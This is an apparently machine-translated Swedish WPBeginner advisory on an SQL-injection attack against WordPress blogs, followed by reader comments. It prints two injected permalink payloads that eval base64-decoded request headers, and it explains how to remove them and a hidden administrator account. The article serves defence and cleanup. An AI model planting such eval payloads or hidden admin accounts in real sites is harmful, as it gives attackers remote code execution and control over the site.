Trusted WordPress tutorials, when you need them most.
Beginner’s Guide to WordPress
WPB Cup
25 Million+
Websites using our plugins
16+
Years of WordPress experience
3000+
WordPress tutorials
by experts

SQL-injektion i WordPress – senaste attacken

Många webbplatser har drabbats av en senaste SQL-attack där koder injiceras på din site. Denna MySQL-injektion påverkar dina permalänkar genom att göra dem ineffektiva. Som ett resultat kommer dina blogginläggs URL:er inte att fungera. Många WordPress bloggar var målet för denna attack, Tack till Andy Soward för att han uppmärksammade oss på detta.

Det var en av följande koder som lades till i din permalänkstruktur på grund av denna attack:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Dessa citat bifogade alla permalänkar på din site och det kan bara ändras om det tas bort manuellt.

För att fixa detta gå till:

Settings > Permalinks och ta bort koden ovan och ersätt den med din standardkod.

Nästa sak du behöver göra är att gå till Användare. Du kommer att se att det finns fler än en administratör. Du kommer inte att se deras namn listade, men du kommer att se att antalet har ökat. Så vad du behöver göra är att titta på alla användare och hitta den sista som registrerade sig. Sätt din mus över den användaren och få länken. Ändra koden userid= genom att lägga till 1 till det numret. Så om den sista användaren som du kan se var användare nr 2, lägg till 1 till den och gör den till 3. Du bör hitta den dolda administratören har en konstig kod som förnamn. Delete koden och gör honom till en prenumerant. Återvänd sedan och ta bort honom.

Detta bör fixa problemet. Du kan också ta bort honom genom att helt enkelt gå till din PHPMyAdmin. Eftersom du kommer att se användaren där.

Vi ville bara få ut den här nyheten så snart vi kan, så att våra användare kan uppdateras. Vänligen se till att du kontrollerar att din blogg inte är infekterad. Vi hoppas att WordPress kommer ut med en release snart.

Även om du inte har implementerat några av dessa åtgärder för att säkra din WordPress Admin Area.

Avslöjande: Vårt innehåll stöds av våra läsare. Det innebär att om du klickar på några av våra länkar, kan vi tjäna en provision. Se hur WPBeginner finansieras, varför det är viktigt, och hur du kan stödja oss. Här är vår editoriala process.

Avatar

Editorial Staff at WPBeginner is a team of WordPress experts led by Syed Balkhi with over 16 years of experience in WordPress, Web Hosting, eCommerce, SEO, and Marketing. Started in 2009, WPBeginner is now the largest free WordPress resource site in the industry and is often referred to as the Wikipedia for WordPress.

Den ultimata WordPress-verktygslådan

Få GRATIS tillgång till vår verktygslåda - en samling WordPress-relaterade produkter och resurser som varje professionell användare bör ha!

Reader Interactions

9 kommentarerLämna ett svar

  1. Syed Balkhi

    Hey WPBeginner readers,
    Did you know you can win exciting prizes by commenting on WPBeginner?
    Every month, our top blog commenters will win HUGE rewards, including premium WordPress plugin licenses and cash prizes.
    You can get more details about the contest from here.
    Start sharing your thoughts below to stand a chance to win!

  2. ahmed_alaaedin

    The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!

  3. a wordpress user

    i was hit by this twice.

    first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.

    once they restore my a/c i will remove wordpres.. I have had it!

    • Editorial Staff

      Perhaps its not WordPress fault, maybe your hosting security is just not as good…

      Administratör

    • Joey

      What did you figure out with this? I was just hit with same issue. All my WP sites on my account are suffering the same problem.

    • Editorial Staff

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      Administratör

      • lerrkin

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was ”Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

Lämna ett svar

Tack för att du väljer att lämna en kommentar. Tänk på att alla kommentarer modereras enligt våra policy för kommentarer, och din e-postadress kommer INTE att publiceras. Vänligen använd INTE nyckelord i namnfältet. Låt oss ha en personlig och meningsfull konversation.